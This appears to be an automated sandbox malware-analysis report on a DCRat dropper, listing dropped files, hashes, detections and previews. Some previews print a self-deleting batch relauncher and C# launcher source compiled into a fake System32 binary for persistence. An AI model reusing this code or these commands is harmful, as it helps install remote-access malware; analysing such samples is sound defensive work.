                                                          SHA-512:9F1D3763950E741796BA18111962B38AF18766B18D959DD8B314F235BA9C7A68CE4DC7A0F847D3F87567998555971092903A2CC8C472FE033BFA3BF0A4225F7B
                                                          Malicious:false
                                                          Preview:gNSkepUqHTRrbAJYeHc1FVqES

                                                          C:\Users\user\AppData\Local\Temp\RES6FF6.tmp

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Mon Jan 13 13:27:02 2025, 1st section name ".debug$S"
                                                          Category:dropped
                                                          Size (bytes):1960
                                                          Entropy (8bit):4.561608901700241
                                                          Encrypted:false
                                                          SSDEEP:24:HPjS9YVXO2L3DfHvOWwKE+lKdYN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0c:DgkT21KplKmKluOulajfqXSfbNtmhxZ
                                                          MD5:116E95EF3A427F30EDB3ED0781A30833
                                                          SHA1:D9FD34C452DBF66B7C1A9B7862DABB6D7FE86579
                                                          SHA-256:1A9F42981A951017FF42A89B97D5F093D08A082A9FF1E510BEAEC5EF3799113A
                                                          SHA-512:7540BACBC6556800963AD0956B371EBDBD9D3CE7C48536DB127C76ADD26BAA48B08345C51517F6CF26856A484AB56D1DA957E7B66EF44770785AA7707622F2C1
                                                          Malicious:false
                                                          Preview:L......g.............debug$S........@...................@..B.rsrc$01................l...........@..@.rsrc$02........p...................@..@........<....c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES6FF6.tmp.-.<....................a..Microsoft (R) CVTRES.g.=..cwd.C:\ProviderserverruntimeperfSvc.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.

                                                          C:\Users\user\AppData\Local\Temp\e6UaCnhMlp.bat

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):230
                                                          Entropy (8bit):5.03591247584877
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DEclRROnGdovKOZG1wkn23f7:HTg9uYDEcl8fT
                                                          MD5:987E794F620663EB65B978E8B025BD94
                                                          SHA1:7BC95AFEDA04BFD1A9494D3AAB15177F89DC8A33
                                                          SHA-256:AAD3DA1CF5D9CACB3815FF3EB0B9243EFD82C5EED5F42F98090A899246F2AAB1
                                                          SHA-512:9C679D7AFA1BE3864AEDD8E02D8AB4E8BAFACA3083A2DDAA9999C982649D23DC20998016F0BA0583791FD3E916FF5296B2FF65D58C0881202B70C89F9085BA23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\e6UaCnhMlp.bat"

                                                          C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.0.cs

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):389
                                                          Entropy (8bit):4.889157992805911
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6YlL9aiFkD:JNVQIbSfhV7TiFkMSfhWYl57FkD
                                                          MD5:357EE34872239C0D304B223557389EF2
                                                          SHA1:D29E328E171F7CB31F4EB3B8D1E324182CE02BEB
                                                          SHA-256:8B52D3FF5E3E10D8A2552CF37324A612B7B002D264C8B6A51680A636162719FE
                                                          SHA-512:9F6B5AE953A79911E428533FCF455910D2CD9B1470E48A9D6C9893E3A3E9E06ABD4E828B5913CE6270239A5CF18F27FDE07672F8AAE5AE556851C286A96C038F
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\ProviderserverruntimeperfSvc\ctfmon.exe"); } catch { } }).Start();. }.}.

                                                          C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):250
                                                          Entropy (8bit):5.086430811510847
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fWM:Hu7L//TRq79cQWf+M
                                                          MD5:BCCF70A721A1B30E34C52B9AA45E1E27
                                                          SHA1:8BBCBB6D2CCCB6F351165057357E46D4FB41314D
                                                          SHA-256:2313E41E1B0E628FAC8A9528B1115D454715F5B144F3420B1D7829804AAAA128
                                                          SHA-512:DB0C32B40F67A3CA23A108DDB8D903E8754A3A1F4C3490F45512B7C6F289F6188E5715ED094712AAD91FEE1328C42B003B261B514A449577562037E863BB0271
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.0.cs"

                                                          C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.out

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (338), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):759
                                                          Entropy (8bit):5.262595498418728
                                                          Encrypted:false
                                                          SSDEEP:12:vIljI/u7L//TRq79cQWf+5KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:gljI/un/Vq79tWf8Kax5DqBVKVrdFAMb
                                                          MD5:98094F46CA6EE6CF407D00259EFD7567
                                                          SHA1:0B7B8F106BD4EA3D6F0EF5F4B5C3498C59977E25
                                                          SHA-256:F47E661AB92DEF9BCED257FE90FB034B51088E007E1D00346742FF3A24528CD3
                                                          SHA-512:CFAA6261F8A8075718335B6DB7E6668A1DDCBC400656B7665288E3C23449EE8A422984A29406A4FB85765E71BADD89AC52AF16AC9E0D2EB3BD8790617C74DD41
                                                          Malicious:false
                                                          Preview:.C:\ProviderserverruntimeperfSvc> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                          C:\Users\user\Desktop\CqAggkYA.log

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Joe Sandbox View:
                                                          • Filename: DCobxod.exe, Detection: malicious, Browse
                                                          • Filename: fatality.exe, Detection: malicious, Browse
                                                          • Filename: NursultanAlphaCrack.bat.exe, Detection: malicious, Browse
                                                          • Filename: SearchIndexer.exe, Detection: malicious, Browse
                                                          • Filename: fatality.exe, Detection: malicious, Browse
                                                          • Filename: OneDriveStandaloneUpdater.exe, Detection: malicious, Browse
                                                          • Filename: 85D5ktqjpd.exe, Detection: malicious, Browse
                                                          • Filename: VIyu4dC9CU.exe, Detection: malicious, Browse
                                                          • Filename: top.exe, Detection: malicious, Browse
                                                          • Filename: DC86.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                          C:\Users\user\Desktop\UxRLAXDP.log

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                          C:\Users\user\Desktop\YsSdHCtI.log

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\jYNBNfNl.log

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Users\user\Desktop\tHgRxHTS.log

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):5.645950918301459
                                                          Encrypted:false
                                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                          C:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                          C:\Windows\System32\SecurityHealthSystray.exe

                                                          Download File
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.9402085817995536
                                                          Encrypted:false
                                                          SSDEEP:48:6NrprPtxM7Jt8Bs3FJsdcV4MKe277aLvqBHOOulajfqXSfbNtm:S5PwPc+Vx9MGvkocjRzNt
                                                          MD5:8726A1715F384FB3A3BAC67D28D0B1A2
                                                          SHA1:DEDE51E4264CAB352FE8387FA60D0FA768B36AB6
                                                          SHA-256:D265D6D654E0E62AA6CBF5F7A0DD021B045ED243F6D44344784E17414D75B65C
                                                          SHA-512:2FA8C153E380249962D4BB7BE7D9F0A4DF5D9AA885FAFB512C39AB9C0A56AF50A947D74FC906CACCC80BADAEBF2F7DD233E0C4095DBB3BE127147EF26D6408F6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                          C:\Windows\debug\backgroundTaskHost.exe

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\debug\backgroundTaskHost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                          C:\Windows\debug\eddb19405b7ce1

                                                          Download File
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with very long lines (611), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):611
                                                          Entropy (8bit):5.873529907204493
                                                          Encrypted:false
                                                          SSDEEP:12:+mTuwWxXsqEbfrjsuvk8akI3WeXGy+y5Vz6ODoSw2dDARBBg9u:+Eu7Xs5ns0C3XGiPz6Xd54u
                                                          MD5:8915B7FA8C6C22C77B62317580FA116B
                                                          SHA1:627C9E4B26A3F5D96737324193D2ED8CE3628445
                                                          SHA-256:78304BEE8A0CF11CCE7AA71EF36E5243000EE93A2C86EE6E818FA23489FAF70A
                                                          SHA-512:FFB88EFDD188F1C3A9E35180A09B4F9A200B190EF5F9A2CDA5143A7C0F676DDF233586E7BF1C5DEE94D9FAD4FBA2EDD1E9B48F4B3EB5C491D6A7C73451DF693A
                                                          Malicious:false
                                                          Preview:N3W2Ot1reb8a4mKkOPfSkZVtnqdqVE6hgUhE6kgMiIOMGJwJ7euZp3BxhmPhPLWZeb4kEGonsTubKJnd4Us0Uh2nTtgTU96WwyroPME1zGqVIkmY8wn4dfF6jRRUkUTtWXpWb9OrP0BN0getGHUiVC3QtvE75uRfx79v4Q69h6pme1FDxhNc9vXUdYnq5Qwfifa3gsy0LVAZWRv1pAKXhzfCkpRfnQERJKD8bMgEtXQnu77MnvB4FY7tAYS1bSM5RsPMNwZceGnJi1RmrE21OJLuMU8D3pmbKVWCsu90Wia8vxKIGqKWZVqHgfA3xWiydM9MfP47FBfqtN9YJz6NfQBzpOfNuFC99leiy7n1wMRYz9XTfmt8aVTNLKhQuqM98grIsbkLMEaS8m9p0LrIWEinRRWnaXHFARZTSPlEBivV5BOiL1Zi8En37D1aE6vy7USqNpXlknGySMsPCycj8jG5ofWPYK9Fw7YkthVfdx8V8zluUlYQdMzXNWCsSINZoABVxIfec7FKkv6z4m4wwtmkHAWWfnNVkiq8yP6LG3xgHpxcaNxqNan5XaNwwI9zttkBE8Aopsq25GdcN36SzgIJ5vkXBJZ747w

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.79541265743596
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FXAQvdZLPRJ6qvpj8XKvj:Vx993DEUps3N
                                                          MD5:45D2DBCE65789EF39FEE6B597E4F136B
                                                          SHA1:194224AC3066B8D5603CBD1237778785F68170A6
                                                          SHA-256:26F55C149122FCA3044605664889DC4080147CC2A4B625DE8B06D4BD6A127484
                                                          SHA-512:47290C7D8FE6877BD2455A25C817B527CE3C4FB7C3AC9AA544CB8210D787A3F024CE5E8E923728079188A63BE25D5531E8CB41DB420F2ECB74CF6E1BBD867FB3
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/01/2025 08:27:05..08:27:05, error: 0x80072746.08:27:10, error: 0x80072746.

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):5.984535183531347
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:SPISOK_DENEG.exe
                                                          File size:1'166'640 bytes
                                                          MD5:490aa1e56fab47858d780a9fdbafb5bf
                                                          SHA1:337d8c93caf41a62f0720ae1f0c02d262ac0a274
                                                          SHA256:595fab3363e5c90ecf3f7375a0b82d996c96b6a0307ad31e6d79dde07eeb8595
                                                          SHA512:7ff8f6983c789f78f67063745fef92040bb5cb88463e82f6a9f05ba0b48021bd2c541cec6e06726748547f0800abd14dd52fe798feddcb1427a46b87619a4f00
                                                          SSDEEP:24576:2TbBv5rUyXV0VTney9cyQJMA+b3iE0nHA6E:IBJgTney9clmA+b3KHe
                                                          TLSH:E0452A182AEE143AF0B3AFB14BD47846D5AEF9737B1E958D14C103CA8612740DE9673B
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                          File Icon

                                                          Icon Hash:1515d4d4442f2d2d

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007FBCDCE7C39Bh
                                                          jmp 00007FBCDCE7BCADh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007FBCDCE6EAF7h
                                                          mov dword ptr [esi], 004356D0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 004356D8h
                                                          mov dword ptr [ecx], 004356D0h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 004356B8h
                                                          push eax
                                                          call 00007FBCDCE7F13Fh
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx
                                                          je 00007FBCDCE7BE3Ch
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007FBCDCE7B3F9h
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FBCDCE6EA72h
                                                          push 0043BEF0h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007FBCDCE7EBF9h
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
